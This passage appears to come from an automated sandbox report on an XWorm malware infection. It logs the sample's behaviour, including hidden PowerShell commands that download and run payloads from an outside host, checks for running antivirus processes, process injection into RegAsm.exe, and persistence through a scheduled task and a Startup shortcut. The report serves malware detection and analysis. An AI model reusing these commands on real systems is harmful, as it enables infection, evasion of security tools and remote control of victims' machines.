              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifMemory written: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe base: D50000
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifMemory written: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe base: FC4000
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_002C9369 LogonUserW,29_2_002C9369
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_00285240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,29_2_00285240
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_002D1AC6 SendInput,keybd_event,29_2_002D1AC6
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_002D51E2 mouse_event,29_2_002D51E2
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat"Jump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\cleanup.bat"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\f.pdf"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\msword\msword.exe msword.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Phpbb Phpbb.bat & Phpbb.bat
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 90
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 220239
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "DimPieLilHot" Statistical
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Response + ..\Fires + ..\Automatic F
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\220239\Carter.pif Carter.pif F
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifProcess created: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr" "C:\Users\user\AppData\Local\CloudSynergy Solutions\R"
              Source: C:\Windows\System32\wscript.exeProcess created: unknown unknown
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\danielpulse.url" & echo url="c:\users\user\appdata\local\cloudsynergy solutions\danielpulse.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\danielpulse.url" & exit
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\danielpulse.url" & echo url="c:\users\user\appdata\local\cloudsynergy solutions\danielpulse.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\danielpulse.url" & exit
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_002C88CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,29_2_002C88CD
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_002D4F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid,29_2_002D4F1C
              Source: msword.exe, 0000000E.00000003.1913133669.0000000002A5E000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001D.00000000.1943094655.0000000000326000.00000002.00000001.01000000.0000000F.sdmp, Carter.pif, 0000001D.00000003.1952206018.0000000003AEC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
              Source: RegAsm.exe, 00000029.00000002.3852880211.00000000030EF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3852880211.00000000030F8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3852880211.00000000030E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q'PING!<Xwormmm>Program Manager<Xwormmm>0
              Source: RegAsm.exe, 00000029.00000002.3852880211.00000000030EF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3852880211.00000000030F8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3852880211.00000000030E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q'PING!<Xwormmm>Program Manager<Xwormmm>0Te
              Source: RegAsm.exe, 00000029.00000002.3852880211.00000000030EF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3852880211.00000000030F8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3852880211.00000000030E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: Carter.pif, DanielPulse.scrBinary or memory string: Shell_TrayWnd
              Source: RegAsm.exe, 00000029.00000002.3852880211.00000000030EF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3852880211.00000000030F8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3852880211.00000000030E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
              Source: RegAsm.exe, 00000029.00000002.3852880211.00000000030EF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3852880211.00000000030F8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3852880211.00000000030E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Managert-
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_0029885B cpuid 29_2_0029885B
              Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
              Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeQueries volume information: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_002B0030 GetLocalTime,__swprintf,29_2_002B0030
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_002B0722 GetUserNameW,29_2_002B0722
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_002A416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,29_2_002A416A
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 14_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,14_2_00406805
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: RegAsm.exe, 00000029.00000002.3851904482.0000000001442000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected XWorm
              Source: Yara matchFile source: 29.3.Carter.pif.38bceb0.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 29.3.Carter.pif.38bceb0.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 29.3.Carter.pif.38bceb0.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 41.2.RegAsm.exe.d50000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 29.2.Carter.pif.38bceb0.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 29.3.Carter.pif.38bceb0.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 29.2.Carter.pif.38bceb0.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000001D.00000003.3345618288.00000000038E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001D.00000003.3345732734.0000000003871000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000029.00000002.3850092334.0000000000D52000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000029.00000002.3852880211.00000000030EF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001D.00000002.3852824301.00000000038BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001D.00000003.3345732734.0000000003890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001D.00000003.3345997131.00000000038B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001D.00000003.3291441566.0000000001128000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001D.00000003.3345618288.00000000038D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
